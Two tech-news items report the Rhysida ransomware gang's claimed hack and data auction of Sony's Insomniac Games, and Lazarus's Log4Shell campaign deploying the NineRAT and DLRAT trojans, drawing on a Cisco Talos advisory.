News Heading - 1

Ransomware Gang Claims to Have Hacked Sony’s Insomniac Games

  • Written by Shipra Sanganeria Cybersecurity & Tech Writer
  • Fact-Checked by Justyn Newman Former Lead Cybersecurity Editor

Insomniac Games, the renowned developer of games like Spider-Man and Spyro the Dragon has allegedly been hacked by ransomware gang, Rhysida.

Based in Burbank, California, Insomniac Games became a part of PlayStation Studios after it was acquired by Sony Interactive Entertainment in 2019.

The gang claims to have ‘’exclusive, unique, and impressive data’’ from the game developer company, which includes US passport copies (allegedly belonging to employees), internal emails, personal data, signed confidential documents, and previews of its upcoming Wolverine game.

The gang has given Insomniac seven days to pay the ransom before it publishes the data. “With just 7 days on the clock, seize the opportunity to bid on exclusive, unique, and impressive data,” Rhysida posted on its leak site . “Open your wallets and be ready to buy exclusive data. We sell only to one hand, no reselling, you will be the only owner!”

Meanwhile, it also put up the stolen data for auction, starting at 50 Bitcoins (around $2 million).

The parent company Sony in a statement to Eurogamer , stated that it’s investigating these claims. “We are aware of reports that Insomniac Games has been the victim of a cyber security attack. We are currently investigating this situation. We have no reason to believe that any other SIE or Sony divisions have been impacted,’’ said Sony.

New to the ransomware scene, the group has been linked to the famous security breach attack at the British Library.

This year, Sony and its subsidiaries have been on the targeted list of various ransomware actors. In September, two separate hackers claimed to have stolen around 3.14 GB of data from the company’s system. Post this, in October 2023, reports of Sony being a victim of the MOVEit file transfer attack surfaced, which compromised sensitive data of 6,791 people in the US.

News Heading - 2

Lazarus Hackers Exploit Log4Shell Security Flaw to Deploy New RAT Malwares

  • Written by Shipra Sanganeria Cybersecurity & Tech Writer

Hackers connected to North Korean threat group, Lazarus, were observed exploiting Log4Shell vulnerability (aka CVE-2021-44228) to attack organizations worldwide.

Discovered in early 2023, the campaign dubbed ‘’ Operation Blacksmith ’’ by Cisco Talos researchers, is said to target manufacturing, agricultural and physical security companies worldwide.

‘’Operation Blacksmith involved the exploitation of CVE-2021-44228, also known as Log4Shell, and the use of a previously unknown DLang-based RAT utilizing Telegram as its C2 channel,’’ the advisory disclosed.

Exploiting Log4Shell flaw in publicly facing VMWare Horizon servers, the actors deployed three novel malwares. Of them, two are remote access trojans (RATs) named NineRAT and DLRAT, and the other is a malware downloader named BottomLoader. A definitive shift in Lazaus’ techniques and tools was observed, overlapping with its alleged sub-group, Onyx Sleet, (aka PLUTIONIUM or Andariel).

Upon initial reconnaissance, the hackers set up a proxy tool ״ HazyLoad ״ for continued access to the infected system. It was also observed that Lazarus, instead of using unauthorized domain-level user accounts, created system-level accounts with administrative privileges.

Another noted deviation observed in their tactic was ‘’downloading and using credential dumping utilities such as ProcDump and MimiKatzs’’ for their hands-on-keyboard activity.

The second phase of the campaign involves the deployment of the novel NineRAT. First identified in March 2023, the DLand-based trojan uses Telegram-based C2 channel for receiving preliminary commands. The malware not only has the ability to uninstall itself from the system but can also perform system re-fingerprinting, in some instances. This allows it to collect data shared by other APT groups.

‘’Re-fingerprinting the infected systems indicates the data collected by Lazarus via NineRAT may be shared by other APT groups and essentially resides in a different repository from the fingerprint data collected initially by Lazarus during their initial access and implant deployment phase,’’ Cisco concludes.